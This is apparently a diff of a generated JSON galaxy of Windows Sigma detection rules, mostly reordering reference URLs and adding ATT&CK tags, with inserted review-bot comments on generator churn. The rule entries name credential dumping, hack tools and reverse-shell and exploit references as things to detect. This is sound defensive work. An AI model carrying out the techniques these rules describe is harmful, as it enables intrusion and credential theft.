@@ -53068,8 +53860,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx", "https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation", + "https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx", + "https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1003.005/T1003.005.md#atomic-test-1---cached-credential-dump-via-cmdkey", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml" ], "tags": [ @@ -53341,8 +54134,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md", "https://attack.mitre.org/software/S0108/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml" ], "tags": [ @@ -53422,9 +54215,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/nas_bench/status/1534916659676422152", "https://twitter.com/nas_bench/status/1534915321856917506", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/", - "https://twitter.com/nas_bench/status/1534916659676422152", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_adplus_memory_dump.yml" ], "tags": [ 
@@ -53649,10 +54442,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/nas_bench/status/1537896324837781506", - "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0", "https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab", + "https://twitter.com/nas_bench/status/1537896324837781506", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0", + "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml" ], "tags": [ 
@@ -53672,6 +54465,34 @@
 "uuid": "dc4576d4-7467-424f-9eee-fd2b02855fe0",
 "value": "Suspicious Cabinet File Execution Via Msdt.EXE"
 },
+ {
+ "description": "Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary.",
+ "meta": {
+ "author": "frack113, Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/09/05",
+ "falsepositive": [
+ "Legitimate usage for debugging purposes"
+ ],
+ "filename": "proc_creation_win_susp_electron_exeuction_proxy.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://chromium.googlesource.com/chromium/chromium/+/master/content/public/common/content_switches.cc",
+ "https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf",
+ "https://lolbas-project.github.io/lolbas/Binaries/Msedge/",
+ "https://lolbas-project.github.io/lolbas/Binaries/Teams/",
+ "https://positive.security/blog/ms-officecmd-rce",
+ "https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ]
+ },
+ "uuid": "378a05d8-963c-46c9-bcce-13c7657eac99",
+ "value": "Potentially Suspicious Electron Application CommandLine"
+ },
 {
 "description": "Detects command line parameters used by Hydra password guessing hack tool",
 "meta": {
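Review bot: The new entry's `filename` and its last `refs` URL spell the rule `proc_creation_win_susp_electron_exeuction_proxy.yml` ("exeuction"); the value is inherited from the upstream Sigma file name, so it is internally consistent and must not be edited in this generated file, but an upstream rename to `proc_creation_win_susp_electron_execution_proxy.yml` is worth requesting before other tooling keys on the misspelt name. The entry carries only a tactic tag (`attack.execution`) and therefore no `related` array, which is consistent with how the other hunks map only technique tags to `dest-uuid` entries; if a technique is later added upstream, the `related` block will need to follow.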
@@ -53770,8 +54591,20 @@ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_progname.yml" ], - "tags": "No established tags" + "tags": [ + "attack.execution", + "attack.t1059" + ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", "value": "Suspicious Program Names" }, @@ -53788,8 +54621,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/outflanknl/Dumpert", "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/", + "https://github.com/outflanknl/Dumpert", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_dumpert.yml" ], "tags": [ @@ -53822,9 +54655,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml" ], 
@@ -54007,9 +54840,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/oulusoyum/status/1191329746069655553", - "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", "https://twitter.com/mattifestation/status/1196390321783025666", + "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", + "https://twitter.com/oulusoyum/status/1191329746069655553", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml" ], "tags": [ @@ -54051,9 +54884,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", "https://redcanary.com/threat-detection-report/threats/qbot/", "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", + "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml" ], "tags": [ @@ -54087,8 +54920,8 @@ "logsource.product": "windows", "refs": [ "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", - "https://lolbas-project.github.io/lolbas/Binaries/Findstr/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Findstr/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml" ], "tags": [ 
@@ -54145,14 +54978,70 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz",
- "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject",
- "https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local",
 "https://www.mandiant.com/resources/telegram-malware-iranian-espionage",
+ "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz",
+ "https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local",
+ "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.execution",
+ "attack.persistence",
+ "attack.privilege_escalation",
+ "attack.credential_access",
+ "attack.discovery",
+ "attack.t1047",
+ "attack.t1053",
+ "attack.t1059.003",
+ "attack.t1059.001",
+ "attack.t1110",
+ "attack.t1201"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "42a993dd-bb3e-48c8-b372-4d6684c4106c",
 "value": "HackTool - CrackMapExec Execution"
 },
@@ -54169,10 +55058,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1",
- "https://adsecurity.org/?p=2604",
 "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/",
 "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1",
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1",
+ "https://adsecurity.org/?p=2604",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml"
 ],
 "tags": [
@@ -54228,8 +55117,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md",
 "https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rar_compress_data.yml"
 ],
 "tags": [
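Review bot: The `refs` block at the top of the CrackMapExec hunk is only permuted, not changed — `mssql-mimikatz`, `checking-credentials-local` and `smb-pe_inject` are removed and re-added in a different order, with the SigmaHQ rule link always kept last — and nearly every other hunk in this file does the same, which points to the generator walking an unordered collection and writing it out in iteration order. That churn buries the substantive changes (the new `tags` and `related` blocks) and makes the uuid mappings this galaxy ships effectively unreviewable; sorting the reference list in the generator, e.g. `refs = sorted(set(refs))` with the rule link appended afterwards, would make regeneration stable. The six `related` entries do line up with the six technique tags (`t1047`, `t1053`, `t1059.003`, `t1059.001`, `t1110`, `t1201`), though the sub-technique tags are not in numeric order either, which suggests the same unordered source and is worth fixing in the same place. Each link is stamped `almost-certain`; that is reasonable for a mapping copied from the rule's own tags, but it does mean the galaxy asserts an ATT&CK linkage confidence the upstream author never stated, so the commit message should say the value is synthetic rather than curated. The hunk begins on the previous physical line.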
@@ -54346,8 +55235,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100", "https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100", + "https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_http_appdata.yml" ], "tags": [ @@ -54397,8 +55286,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20201124182207/https://github.com/yosqueoy/ditsnap", "https://thedfirreport.com/2020/06/21/snatch-ransomware/", + "https://web.archive.org/web/20201124182207/https://github.com/yosqueoy/ditsnap", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_ditsnap.yml" ], "tags": [ @@ -54431,8 +55320,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing", "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/", + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc_mmc20_lateral_movement.yml" ], "tags": [ 
@@ -54465,9 +55354,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/", "https://www.gpg4win.de/documentation.html", - "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_decryption.yml" ], "tags": [ @@ -54717,10 +55606,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/wunderwuzzi23/firefox-cookiemonster", - "https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/", "https://github.com/defaultnamehere/cookie_crimes/", "https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf", + "https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/", + "https://github.com/wunderwuzzi23/firefox-cookiemonster", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_remote_debugging.yml" ], "tags": [ 
@@ -54753,12 +55642,24 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace",
 "https://twitter.com/0gtweet/status/1474899714290208777?s=12",
+ "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.discovery",
+ "attack.t1082"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795",
 "value": "Suspicious Kernel Dump Using Dtrace"
 },
@@ -54808,8 +55709,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/blackorbird/status/1140519090961825792",
 "https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html",
+ "https://twitter.com/blackorbird/status/1140519090961825792",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_double_extension.yml"
 ],
 "tags": [
@@ -54842,10 +55743,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Libraries/Setupapi/",
 "https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf",
 "https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf",
 "https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20",
+ "https://lolbas-project.github.io/lolbas/Libraries/Setupapi/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml"
 ],
 "tags": [
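Review bot: The Suspicious Kernel Dump Using Dtrace entry now carries only `attack.discovery` / `attack.t1082` and one `related` link to `354a7f88-63fb-41b5-a801-ce3b377b36f1` (presumably the T1082 attack-pattern id), yet a live kernel memory dump is first and foremost a credential-exposure event — LSA secrets and cached hashes are in the dumped memory — so any triage that keys priority off the galaxy's tactic tags will file this high-value rule under reconnaissance. The tag set presumably mirrors whatever the upstream Sigma rule declares, so the correction belongs upstream or in a local override rather than in this generated file, but the `almost-certain` estimative tag on the link implies the mapping was reviewed, and the commit message should say whether it was. As elsewhere in this diff, the `docs.microsoft.com` dtrace reference is merely removed and re-added in a different position, which is generator iteration-order noise rather than a content change.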
@@ -55044,8 +55945,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/takeown", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_takeown_recursive_own.yml" ], "tags": [ @@ -55145,8 +56046,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/RedDrip7/status/1506480588827467785", "https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/", + "https://twitter.com/RedDrip7/status/1506480588827467785", "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_susp_pattern.yml" ], @@ -55180,8 +56081,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/deepinstinct/Lsass-Shtinkering", "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", + "https://github.com/deepinstinct/Lsass-Shtinkering", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml" ], "tags": [ 
@@ -55323,9 +56224,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", - "https://redcanary.com/blog/child-processes/", "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf", + "https://redcanary.com/blog/child-processes/", + "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dllhost_no_cli_execution.yml" ], "tags": [ @@ -55400,8 +56301,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/", "https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/", + "https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cl_loadassembly.yml" ], "tags": [ @@ -55690,8 +56591,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml" ], "tags": [ 
@@ -55760,8 +56661,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/clip", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1115/T1115.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/clip", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_clip_execution.yml" ], "tags": [ @@ -55794,9 +56695,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", - "https://www.php.net/manual/en/features.commandline.php", "https://www.revshells.com/", + "https://www.php.net/manual/en/features.commandline.php", + "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_php_inline_command_execution.yml" ], "tags": [ @@ -55888,9 +56789,9 @@ "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/", - "https://gist.github.com/nasbench/6d58c3c125e2fa1b8f7a09754c1b087f", - "https://twitter.com/mrd0x/status/1511415432888131586", "https://twitter.com/mrd0x/status/1511489821247684615", + "https://twitter.com/mrd0x/status/1511415432888131586", + "https://gist.github.com/nasbench/6d58c3c125e2fa1b8f7a09754c1b087f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dumpminitool_execution.yml" ], "tags": [ 
@@ -55967,8 +56868,8 @@ "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a", "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_rclone_execution.yml" ], "tags": [ @@ -56091,8 +56992,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package", "https://twitter.com/WindowsDocs/status/1620078135080325122", + "https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml" ], "tags": [ @@ -56236,8 +57137,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://nsudo.m2team.org/en-us/", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nsudo.yml" ], "tags": [ 
@@ -56519,14 +57420,14 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://reaqta.com/2017/12/mavinject-microsoft-injector/", - "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", - "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", - "https://twitter.com/Hexacorn/status/776122138063409152", - "https://github.com/SigmaHQ/sigma/issues/3742", "https://twitter.com/gN3mes1s/status/941315826107510784", + "https://reaqta.com/2017/12/mavinject-microsoft-injector/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/SigmaHQ/sigma/issues/3742", + "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", + "https://twitter.com/Hexacorn/status/776122138063409152", + "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml" ], "tags": [ 
@@ -56780,8 +57681,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md", "https://github.com/OTRF/detection-hackathon-apt29/issues/16", + "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml" ], "tags": [ @@ -56848,9 +57749,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/frack113/status/1555830623633375232", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", + "https://twitter.com/frack113/status/1555830623633375232", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml" ], "tags": [ 
@@ -56960,29 +57861,6 @@
 "uuid": "ac1c92b4-ac81-405a-9978-4604d78cc47e",
 "value": "Potential Binary Proxy Execution Via VSDiagnostics.EXE"
 },
- {
- "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2023/01/18",
- "falsepositive": [
- "Legitimate sub processes started by Manage Engine ServiceDesk Pro"
- ],
- "filename": "proc_creation_win_susp_manageengine_pattern.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://blog.viettelcybersecurity.com/saml-show-stopper/",
- "https://github.com/horizon3ai/CVE-2022-47966/blob/3a51c6b72ebbd87392babd955a8fbeaee2090b35/CVE-2022-47966.py",
- "https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_manageengine_pattern.yml"
- ],
- "tags": "No established tags"
- },
- "uuid": "cea2b7ea-792b-405f-95a1-b903ea06458f",
- "value": "Manage Engine Java Suspicious Sub Process"
- },
 {
 "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.",
 "meta": {
@@ -56996,8 +57874,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "Internal Research",
 "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
+ "Internal Research",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml"
 ],
 "tags": [
